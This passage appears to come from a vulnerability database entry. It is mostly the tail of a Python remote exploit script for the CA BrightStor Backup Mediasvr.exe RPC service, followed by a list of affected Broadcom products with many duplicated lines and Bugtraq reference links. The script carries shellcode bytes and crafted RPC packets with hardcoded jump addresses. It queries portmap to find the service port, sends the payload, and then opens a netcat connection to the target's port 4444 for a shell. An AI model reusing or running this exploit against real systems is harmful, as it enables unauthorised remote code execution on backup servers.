shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
#------------------------------------------------------------------------
#First Packet
rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00"
rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
#Prodcedure 190 and nulls
rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
#Apparently these 4 bytes can be anything
rpc_packet1+="\x00\x00\x00\x00"
#This value is important for the location of the next address
rpc_packet1+="\x00\x00\x00\x00"
#Hardcoded Address loaded into ECX
rpc_packet1+="\x00\xae\x27\x64"
#Just spacing
rpc_packet1+="\x41\x42\x43\x44"
#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet1+="\x3c\x27\xae\x00"
#jump to shellcode for packet 1
rpc_packet1+="\x6c\x27\xae\x00"
rpc_packet1+="\xeb\x01"
rpc_packet1+=shellcode
#------------------------------------------------------------------------
#Second Packet
rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00"
rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
#Procedure 190 and nulls
rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
#Apparently these 4 bytes can be anything
rpc_packet2+="\x00\x00\x00\x00"
#This value is important for the location of the next address
rpc_packet2+="\x00\x00\x00\x00"
#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been
#restarted
rpc_packet2+="\x00\x9e\x27\x64"
#Just spacing
rpc_packet2+="\x41\x42\x43\x44"
#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet2+="\x3c\x27\x9e\x00"
#jump to shellcode for packet 2
rpc_packet2+="\x6c\x27\x9e\x00"
rpc_packet2+="\xeb\x01"
rpc_packet2+=shellcode
# Portmap request for Mediasvr.exe
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00"
rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00"
rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"
#------------------------------------------------------------------------
def GetMediaSvrPort(target):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,111))
sock.send(rpc_portmap_req)
rec = sock.recv(256)
sock.close()
port1 = rec[-4]
port2 = rec[-3]
port3 = rec[-2]
port4 = rec[-1]
port1 = hex(ord(port1))
port2 = hex(ord(port2))
port3 = hex(ord(port3))
port4 = hex(ord(port4))
port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))
port = int(port,16)
if port < 1100:
print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)
ExploitMediaSvr(target,port,1)
else:
print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)
ExploitMediaSvr(target,port,2)
def ExploitMediaSvr(target,port,p):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
if p == 1:
sock.send(rpc_packet1)
elif p == 2:
sock.send(rpc_packet2)
sock.close ()
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
print '[+] Author: Shirkdog'
print '[+] Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
print '[+] Author: Shirkdog'
GetMediaSvrPort(target)
print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target
time.sleep(3)
connect = "/usr/bin/nc -vn " + target + " 4444"
os.system(connect)
Products Mentioned
Configuraton 0
Broadcom>>Brightstor_arcserve_backup >> Version To (including) 11.5
- Broadcom>>Brightstor_arcserve_backup >> Version 11.5 (Open CPE detail)
Broadcom>>Brightstor_arcserve_backup >> Version 9.01
- Broadcom>>Brightstor_arcserve_backup >> Version 9.01 (Open CPE detail)
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
- Broadcom>>Brightstor_arcserve_backup >> Version 11.1 (Open CPE detail)
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
- Broadcom>>Brightstor_enterprise_backup >> Version 10.5 (Open CPE detail)
Broadcom>>Business_protection_suite >> Version 2.0
- Broadcom>>Business_protection_suite >> Version 2.0 (Open CPE detail)
Broadcom>>Server_protection_suite >> Version 2
- Broadcom>>Server_protection_suite >> Version 2 (Open CPE detail)
Ca>>Brightstor_arcserve_backup >> Version 11
References
http://www.securityfocus.com/archive/1/447862/100/100/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/447930/100/200/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/447926/100/200/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/447847/100/200/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/447927/100/200/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://www.securityfocus.com/archive/1/447839/100/100/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/447848/100/100/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
